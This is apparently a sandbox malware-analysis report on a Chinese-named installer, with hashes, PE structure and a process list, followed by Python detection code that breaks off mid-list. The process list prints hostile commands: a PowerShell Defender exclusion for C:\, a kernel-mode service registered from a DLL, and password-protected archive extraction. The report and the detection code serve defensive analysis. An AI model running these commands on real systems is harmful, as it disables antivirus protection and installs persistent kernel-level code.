                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3598848
                                          Entropy (8bit):7.004949099807939
                                          Encrypted:false
                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:ASCII text, with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):406
                                          Entropy (8bit):5.117520345541057
                                          Encrypted:false
                                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                          MD5:9200058492BCA8F9D88B4877F842C148
                                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                          Malicious:false
                                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.921087624135217
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 98.04%
                                          • Inno Setup installer (109748/4) 1.08%
                                          • InstallShield setup (43055/19) 0.42%
                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                          File name:#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          File size:5'707'365 bytes
                                          MD5:65296edf39a492d0d9dbe2c7b6735df7
                                          SHA1:b256b2f4f2537239b244e131c33418bbf2723b8b
                                          SHA256:07287146cb055a3a593306fcb09d498f6b2a533f68aeb43e28ebccd2fc1c1e3f
                                          SHA512:45f43460fe66722e17e9e7f301321335e9d31abbf6d8458e236b2d882171eb4baa227f4a91452128c7e0f13be2f85f3edbefa995947dedb3105da5465dee965f
                                          SSDEEP:98304:XwREH1zu2+J1cx3RRw6Fw4fHPEnkQncsAsXZV8U4dBYmEWYbAjoibWNUtmKdMwZO:lAHTcxBRhw4fHcpXL8U43PEbUomWCtmh
                                          TLSH:F7461213F2CBE13EE05E0B3B0AB2B15494FB6A506422AD1696EC74ECCF751601E3E657
                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                          Icon Hash:0c0c2d33ceec80aa
                                          Entrypoint:0x4a83bc
                                          Entrypoint Section:.itext
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:1
                                          File Version Major:6
                                          File Version Minor:1
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:1
                                          Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          add esp, FFFFFFA4h
                                          push ebx
                                          push esi
                                          push edi
                                          xor eax, eax
                                          mov dword ptr [ebp-3Ch], eax
                                          mov dword ptr [ebp-40h], eax
                                          mov dword ptr [ebp-5Ch], eax
                                          mov dword ptr [ebp-30h], eax
                                          mov dword ptr [ebp-38h], eax
                                          mov dword ptr [ebp-34h], eax
                                          mov dword ptr [ebp-2Ch], eax
                                          mov dword ptr [ebp-28h], eax
                                          mov dword ptr [ebp-14h], eax
                                          mov eax, 004A2EBCh
                                          call 00007FBE3877ABA5h
                                          xor eax, eax
                                          push ebp
                                          push 004A8AC1h
                                          push dword ptr fs:[eax]
                                          mov dword ptr fs:[eax], esp
                                          xor edx, edx
                                          push ebp
                                          push 004A8A7Bh
                                          push dword ptr fs:[edx]
                                          mov dword ptr fs:[edx], esp
                                          mov eax, dword ptr [004B0634h]
                                          call 00007FBE3880C52Bh
                                          call 00007FBE3880C07Eh
                                          lea edx, dword ptr [ebp-14h]
                                          xor eax, eax
                                          call 00007FBE38806D58h
                                          mov edx, dword ptr [ebp-14h]
                                          mov eax, 004B41F4h
                                          call 00007FBE38774C53h
                                          push 00000002h
                                          push 00000000h
                                          push 00000001h
                                          mov ecx, dword ptr [004B41F4h]
                                          mov dl, 01h
                                          mov eax, dword ptr [0049CD14h]
                                          call 00007FBE38808083h
                                          mov dword ptr [004B41F8h], eax
                                          xor edx, edx
                                          push ebp
                                          push 004A8A27h
                                          push dword ptr fs:[edx]
                                          mov dword ptr fs:[edx], esp
                                          call 00007FBE3880C5B3h
                                          mov dword ptr [004B4200h], eax
                                          mov eax, dword ptr [004B4200h]
                                          cmp dword ptr [eax+0Ch], 01h
                                          jne 00007FBE3881329Ah
                                          mov eax, dword ptr [004B4200h]
                                          mov edx, 00000028h
                                          call 00007FBE38808978h
                                          mov edx, dword ptr [004B4200h]
                                           Name                                  Virtual Address  Virtual Size  Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT          0xb7000          0x71          .edata
                                           IMAGE_DIRECTORY_ENTRY_IMPORT          0xb5000          0xfec         .idata
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE        0xcb000          0x11000       .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC       0xba000          0x10fa8       .reloc
                                           IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_TLS             0xb9000          0x18          .rdata
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_IAT             0xb52d4          0x25c         .idata
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0xb6000          0x1a4         .didata
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                           Name     Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                           .text    0x1000           0xa568c       0xa5800   b889d302f6fc48a904de33d8d947ae80  False     0.3620185045317221   data       6.377190161826806   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                           .itext   0xa7000          0x1b64        0x1c00    588dd0a8ab499300d3701cbd11b017d9  False     0.548828125          data       6.109264411030635   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                           .data    0xa9000          0x3838        0x3a00    5c0c76e77aef52ebc6702430837ccb6e  False     0.35338092672413796  data       4.95916338709992    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                           .bss     0xad000          0x7258        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                           .idata   0xb5000          0xfec         0x1000    627340dff539ef99048969aa4824fb2d  False     0.380615234375       data       5.020404933181373   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                           .didata  0xb6000          0x1a4         0x200     fd11c1109737963cc6cb7258063abfd6  False     0.34765625           data       2.729290535217263   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                           .edata   0xb7000          0x71          0x200     7de8ca0c7a61668a728fd3a88dc0942d  False     0.1796875            data       1.305578535725827   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .tls     0xb8000          0x18          0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                           .rdata   0xb9000          0x5d          0x200     d84006640084dc9f74a07c2ff9c7d656  False     0.189453125          data       1.3892750148744617  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .reloc   0xba000          0x10fa8       0x11000   a85fda2741bd9417695daa5fc5a9d7a5  False     0.5789579503676471   data       6.709466460182023   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                           .rsrc    0xcb000          0x11000       0x11000   fe932d5676ad361c48f8d49d8256c9db  False     0.18784466911764705  data       3.7211238544779355  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                           RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                                           RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                                           RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                                           RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                                           RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                                           RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                                           RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                                           RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                                           RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                                           RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                                           RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                                           RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                                           RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                                           RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                                           RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                                           RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                                           RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                                           RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                                           RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                                           RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                                           RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                                           RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                                           RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                                           RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                                           RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                                           RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                                           RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1590909090909092
                                           RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                                           RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2804532577903683
                                           RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                           DLL | Import
                                           kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                           comctl32.dll | InitCommonControls
                                           user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                           oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                           advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                           Name | Ordinal | Address
                                           __dbk_fcall_wrapper | 2 | 0x40fc10
                                           dbkFCallWrapperAddr | 1 | 0x4b063c
                                           Language of compilation system | Country where language is spoken | Map
                                           English | United States |
                                           Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                           Dec 23, 2024 09:15:52.653496027 CET | 1.1.1.1 | 192.168.2.5 | 0x48e9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                           Dec 23, 2024 09:15:52.653496027 CET | 1.1.1.1 | 192.168.2.5 | 0x48e9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false

                                          Target ID:0
                                          Start time:03:15:36
                                          Start date:23/12/2024
                                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe"
                                          Imagebase:0xd50000
                                          File size:5'707'365 bytes
                                          MD5 hash:65296EDF39A492D0D9DBE2C7B6735DF7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:03:15:36
                                          Start date:23/12/2024
                                          Path:C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe"
                                          Imagebase:0xd00000
                                          File size:3'366'912 bytes
                                          MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Antivirus matches:
                                          • Detection: 0%, ReversingLabs
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:3
                                          Start time:03:15:37
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:03:15:37
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:03:15:37
                                          Start date:23/12/2024
                                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
                                          Imagebase:0xd50000
                                          File size:5'707'365 bytes
                                          MD5 hash:65296EDF39A492D0D9DBE2C7B6735DF7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Reputation:low
                                          Has exited:false

                                          Target ID:6
                                          Start time:03:15:38
                                          Start date:23/12/2024
                                          Path:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$20490,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
                                          Imagebase:0x600000
                                          File size:3'366'912 bytes
                                          MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Antivirus matches:
                                          • Detection: 0%, ReversingLabs
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:7
                                          Start time:03:15:41
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                          Wow64 process (32bit):true
                                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                          Imagebase:0x890000
                                          File size:831'200 bytes
                                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 0%, ReversingLabs
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:11
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                          Wow64 process (32bit):true
                                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                          Imagebase:0x890000
                                          File size:831'200 bytes
                                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true
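
                                           The process list above shows three behaviours worth turning into detections: powershell.exe adding a Windows Defender exclusion for the whole of C:\, sc.exe registering a kernel-mode service (type= kernel) whose image is a .dll under "Program Files (x86)\Windows NT" rather than a .sys under System32\drivers, and 7zr.exe extracting password-protected archives from files named res.dat and locale3.dat. The Python below is an added example written for this page, not part of the Joe Sandbox report and not code belonging to the sample; it runs those checks over process-creation events. The event shape (image + cmdline dictionaries), the rule names, the archive-extension list and the two benign control events are assumptions; the malicious command lines are copied from the process list, and the -EncodedCommand variant is constructed to show that the check still fires when the cmdlet is base64-encoded, a common way of hiding it from plain string matching.

```python
"""Detection pass over process-creation events for three techniques in the process list
above: a Defender exclusion via Add-MpPreference, a kernel-mode service registered through
sc.exe whose image is not a .sys under System32\\drivers, and 7-Zip extracting a
password-protected archive from a file with a non-archive extension."""
import base64
import ntpath
import re
from collections import namedtuple

ARCHIVE_EXT = {".7z", ".zip", ".rar", ".tar", ".gz", ".xz", ".bz2", ".cab", ".iso", ".wim"}
SEVEN_ZIP = {"7z.exe", "7za.exe", "7zr.exe", "7zg.exe"}
MP_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", re.I)
# -e/-ec/-enc/-encodedcommand are the usual spellings; PowerShell accepts any unambiguous prefix
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
ROOT_RE = re.compile(r"-ExclusionPath\s+['\"]*([A-Za-z]:\\?)['\"]*(?:[\s,;]|$)", re.I)
Finding = namedtuple("Finding", "rule image detail")   # rule names are this example's own

def win_split(cmdline: str) -> list:
    """Tokens are a double-quoted run or a run of non-space characters (no backslash escapes)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|[^\s"]+', cmdline)]

def encode_powershell_command(script: str) -> str:
    """Base64 of UTF-16LE, the form -EncodedCommand expects (used here to build test data)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> str:
    """Return the script PowerShell will actually run: the decoded -EncodedCommand payload if present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def parse_sc_create(tokens: list):
    """Parse 'sc create <name> key= value ...' (sc.exe requires the space after '=')."""
    if len(tokens) < 3 or ntpath.basename(tokens[0]).lower() not in ("sc", "sc.exe") \
            or tokens[1].lower() != "create":
        return None
    opts, i = {"name": tokens[2]}, 3
    while i < len(tokens):
        key, sep, val = tokens[i].partition("=")
        if sep and not val and i + 1 < len(tokens):   # 'binPath=' followed by its value
            i += 1
            val = tokens[i]
        if sep:
            opts[key.lower()] = val
        i += 1
    return opts

def check_event(image: str, cmdline: str) -> list:
    findings, exe, tokens = [], ntpath.basename(image).lower(), win_split(cmdline)
    # 1. Defender exclusion, plain or base64-encoded; excluding a bare drive root is the worst case
    if exe in ("powershell.exe", "pwsh.exe"):
        script = decode_encoded_command(cmdline)
        m = MP_RE.search(script)
        if m:
            sev = "drive-root" if ROOT_RE.search(script) else "path"
            findings.append(Finding("defender_exclusion", image, f"{m.group(0)} ({sev})"))
    # 2. Kernel-mode service whose image is not a .sys under System32\drivers
    sc = parse_sc_create(tokens)
    if sc and sc.get("type", "").lower() in ("kernel", "filesys"):
        binpath = sc.get("binpath", "")
        if ntpath.splitext(binpath)[1].lower() != ".sys" or "\\system32\\drivers\\" not in binpath.lower():
            findings.append(Finding("kernel_service_odd_image", image, f"{sc['name']} -> {binpath}"))
    # 3. 7-Zip extract (x/e) with -p<password> from a file whose extension is not an archive's
    if exe in SEVEN_ZIP and len(tokens) > 1 and tokens[1].lower() in ("x", "e"):
        args = tokens[2:]
        archives = [t for t in args if not t.startswith("-")]
        if any(t.startswith("-p") for t in args) and archives \
                and ntpath.splitext(archives[0])[1].lower() not in ARCHIVE_EXT:
            findings.append(Finding("7zip_password_disguised_archive", image, archives[0]))
    return findings

def scan(events: list) -> list:
    return [f for ev in events for f in check_event(ev["image"], ev["cmdline"])]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SC = r"C:\Windows\System32\sc.exe"
# Constructed events: the first four command lines are copied from the process list above,
# then a constructed -enc variant of the exclusion and two benign controls.
SAMPLE_EVENTS = [
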